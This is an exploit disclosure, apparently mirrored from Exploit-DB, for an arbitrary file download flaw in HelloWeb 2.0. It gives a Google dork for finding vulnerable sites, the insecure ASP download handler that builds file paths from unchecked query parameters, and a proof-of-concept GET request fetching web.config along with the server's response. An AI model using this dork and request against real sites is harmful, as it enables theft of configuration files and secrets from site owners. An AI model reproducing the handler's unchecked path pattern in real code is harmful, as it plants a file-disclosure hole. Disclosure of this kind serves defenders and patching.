HelloWeb 2.0 – Arbitrary File Download

  • 作者: bRpsd
    日期: 2020-07-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48659/
  • # Exploit Title: HelloWeb 2.0 - Arbitrary File Download
    # Date: 2020-07-09
    # Vendor Homepage: https://helloweb.co.kr/
    # Version: 2.0 [Latest] and previous versions
    # Exploit Author: bRpsd
    # Contact Author: cy[at]live.no
    # Google Dork: inurl:exec/file/download.asp
    # Type: WebApps / ASP
    -----------------------------------------------------
    
    
    
    Vulnerable code:
    ######################################################################################################
    Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile
    
    filepath = Request.QueryString("filepath")
    filename = Request.QueryString("filename")
    filepath = Replace(filepath,"/","\")
    
    root_path = server.MapPath("/")
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set root_folder = fso.GetFolder(root_path)
    
    attachfile = root_path & filepath & "\" & filename
    
    Response.Clear
    Response.ContentType = "application/unknown"
    Response.AddHeader "Pragma", "no-cache"
    Response.AddHeader "Expires", "0"
    Response.AddHeader "Content-Transfer-Encoding", "binary"
    Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
    
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Open
    
    objStream.Type = 1
    objStream.LoadFromFile attachfile
    
    Response.BinaryWrite objStream.Read
    Response.Flush
    ######################################################################################################
    
    Vulnerability: Arbitrary File Download
    Location: http://localhost/exec/file/download.asp
    Parameters: filename & filepath
    
    Proof of concept:
    
    GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    RESPONSE:
    HTTP/1.1 200 OK
    Cache-Control: private
    Pragma: no-cache
    Content-Type: application/unknown; Charset=utf-8
    Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
    Server:
    Content-Transfer-Encoding: binary
    Content-Disposition: attachment; filename = web.config
    Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
    Access-Control-Allow-Origin: *
    x-xss-protection: 1; mode=block
    Date: Thu, 09 Jul 2020 10:51:14 GMT
    Connection: close